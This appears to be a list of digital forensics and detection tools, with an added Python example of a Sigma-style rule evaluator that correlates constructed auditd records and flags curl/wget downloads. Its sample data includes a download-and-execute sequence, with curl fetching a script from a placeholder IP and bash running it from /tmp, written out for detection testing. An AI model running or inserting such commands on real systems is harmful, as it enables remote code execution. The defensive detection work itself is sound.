A standalone SIGMA-based detection tool for EVTX, Auditd and Sysmon for Linux logs
Updated Mar 14, 2026 - Python
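The first entry above is a Sigma-based detector for EVTX, auditd and Sysmon for Linux logs. As an added example of what such a tool does at its core (this is illustrative code, not that project's implementation), here is a minimal Sigma-style rule evaluator run over constructed auditd records: it splits auditd key=value records, joins the SYSCALL and EXECVE records that share an audit event id, builds a CommandLine field from the a0..aN argv entries, and evaluates a rule whose `detection` block has the same shape as a Sigma YAML rule (field modifiers, OR over value lists, AND over fields, `and`/`or`/`not` condition). Assumptions: the sample lines are constructed and show argv unencoded for readability (real auditd hex-encodes arguments containing spaces or quotes), the `CommandLine` field name is my own normalization, the rule is hypothetical, and the rule is written as a Python dict to avoid a YAML dependency.

```python
import re
import shlex
from collections import defaultdict

# Constructed auditd SYSCALL/EXECVE records (not real captures). Real auditd would
# hex-encode a2 of event 4522 because it contains spaces; shown decoded here.
SAMPLE_AUDITD = [
    'type=SYSCALL msg=audit(1710403200.123:4521): arch=c000003e syscall=59 success=yes exit=0 comm="curl" exe="/usr/bin/curl" uid=1000 auid=1000 key="exec"',
    'type=EXECVE msg=audit(1710403200.123:4521): argc=3 a0="curl" a1="-fsSL" a2="http://203.0.113.10/x.sh"',
    'type=SYSCALL msg=audit(1710403201.456:4522): arch=c000003e syscall=59 success=yes exit=0 comm="bash" exe="/usr/bin/bash" uid=0 auid=0 key="exec"',
    'type=EXECVE msg=audit(1710403201.456:4522): argc=3 a0="bash" a1="-c" a2="chmod +x /tmp/x.sh && /tmp/x.sh"',
    'type=SYSCALL msg=audit(1710403202.789:4523): arch=c000003e syscall=59 success=yes exit=0 comm="apt" exe="/usr/bin/apt" uid=0 auid=1000 key="exec"',
    'type=EXECVE msg=audit(1710403202.789:4523): argc=2 a0="apt" a1="update"',
    'type=SYSCALL msg=audit(1710403203.000:4524): arch=c000003e syscall=59 success=yes exit=0 comm="wget" exe="/usr/bin/wget" uid=0 auid=1000 key="exec"',
    'type=EXECVE msg=audit(1710403203.000:4524): argc=2 a0="wget" a1="http://archive.ubuntu.com/ubuntu/pool/main/x.deb"',
]

# Hypothetical rule, structured like a Sigma YAML rule's detection block.
# "exe" is the auditd field; "CommandLine" is this example's normalized argv field.
RULE = {
    "title": "Remote content fetched by curl/wget (hypothetical example rule)",
    "logsource": {"product": "linux", "service": "auditd"},
    "detection": {
        "selection": {"exe|endswith": ["/curl", "/wget"], "CommandLine|contains": "http"},
        "filter_pkg": {"CommandLine|contains": "archive.ubuntu.com"},
        "condition": "selection and not filter_pkg",
    },
}


def parse_auditd_line(line):
    """Split one auditd record into a dict of key=value fields.
    shlex handles the double-quoted values auditd emits for comm/exe/a0..aN."""
    fields = {}
    for tok in shlex.split(line):
        k, _, v = tok.partition("=")
        fields[k] = v
    m = re.match(r"audit\((?P<ts>[\d.]+):(?P<id>\d+)\)", fields.get("msg", ""))
    fields["_event_id"] = m.group("id") if m else None
    return fields


def correlate_events(lines):
    """Merge records sharing an audit event id; EXECVE argv becomes CommandLine."""
    events = defaultdict(dict)
    for line in lines:
        rec = parse_auditd_line(line)
        ev = events[rec["_event_id"]]
        if rec.get("type") == "EXECVE":
            argv = [rec[f"a{i}"] for i in range(int(rec["argc"]))]
            ev["CommandLine"] = " ".join(argv)
        else:
            ev.update({k: v for k, v in rec.items() if not k.startswith("_")})
    return list(events.values())


def match_value(field_value, pattern, modifier):
    """Sigma string matching is case-insensitive; 're' is the one case-sensitive modifier."""
    fv, pat = field_value.lower(), str(pattern).lower()
    if modifier == "contains":
        return pat in fv
    if modifier == "startswith":
        return fv.startswith(pat)
    if modifier == "endswith":
        return fv.endswith(pat)
    if modifier == "re":
        return re.search(str(pattern), field_value) is not None
    return fv == pat


def match_selection(selection, event):
    """List of maps: OR. Map: AND over fields. List of values for a field: OR."""
    if isinstance(selection, list):
        return any(match_selection(s, event) for s in selection)
    for key, values in selection.items():
        field, _, modifier = key.partition("|")
        if field not in event:
            return False
        values = values if isinstance(values, list) else [values]
        if not any(match_value(event[field], v, modifier) for v in values):
            return False
    return True


def eval_condition(condition, detection, event):
    """Tiny recursive-descent evaluator for 'a and not b', 'a or (b and c)', etc."""
    toks = re.findall(r"\(|\)|\w+", condition)
    pos = 0

    def peek():
        return toks[pos] if pos < len(toks) else None

    def take():
        nonlocal pos
        pos += 1
        return toks[pos - 1]

    def expr():
        v = term()
        while peek() == "or":
            take()
            r = term()
            v = v or r
        return v

    def term():
        v = factor()
        while peek() == "and":
            take()
            r = factor()
            v = v and r
        return v

    def factor():
        t = take()
        if t == "not":
            return not factor()
        if t == "(":
            v = expr()
            take()  # consume ')'
            return v
        return match_selection(detection[t], event)

    return expr()


def run_rule_on_auditd(rule, lines):
    """Return the correlated events for which the rule's condition holds."""
    det = rule["detection"]
    return [ev for ev in correlate_events(lines) if eval_condition(det["condition"], det, ev)]


if __name__ == "__main__":
    for hit in run_rule_on_auditd(RULE, SAMPLE_AUDITD):
        print(RULE["title"], "->", hit["exe"], hit["CommandLine"])
```

Of the four constructed events, only the curl download matches: bash and apt fail the selection, and the wget fetch from archive.ubuntu.com is caught by the selection but excluded by the `filter_pkg` clause, which is the usual Sigma pattern for whitelisting known-good activity without weakening the main selection.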
A simple-to-use IR (incident response) case management tool for tracking and documenting investigations.
macOS forensic acquisition made simple
Field reference for BTL1 and Tier 1 SOC work — grep-ready cheatsheets, SPL queries, Volatility workflows, live response commands
A repo that aims to centralize a current, running list of relevant parsers/tools for known DFIR artifacts
macos-collector - Automated Collection of macOS Forensic Artifacts for DFIR
Vault of Windows Registry forensic artifacts
Casting light on shadow cloud deployments. Detect exposure of resources deployed in AWS.
A tool for fetching DFIR and other GitHub tools.
Automatically create iSCSI targets for all drives except the boot device
like ripgrep but for browser history
A collection of PowerShell scripts for analyzing macOS Forensic Artifacts
Cryptocurrency Discovery and Triage Tool - Identify multiple cryptocurrency addresses and transactions from various wallet applications!
Automated triage tool for different types of artifact collections.
Utility for recovering ES File Explorer encrypted files (.eslock)
A deployment and testing platform for Velociraptor's client artifacts
A lightweight tool for quick triage on live Win10/11 systems, extracting the Journal, Execution Timeline and Drive-Logs, with an included Process Memory String Parsing Tool.
Forensic timeline analysis tool, rewritten from Python to Go. Desktop application for analyzing large-scale forensic datasets, particularly timeline data from log2timeline (L2T) format files.
A single open-source Python/tkinter-based tool that performs anomaly detection, attack detection and digital forensic analysis on local networks. Catches Turkey-focused threats with a customizable signature database!
This repository is a living knowledge base that brings together professional YARA rules for cybersecurity specialists, SOC teams and threat hunters. Each rule was developed as the result of in-depth malware analysis and reverse engineering work.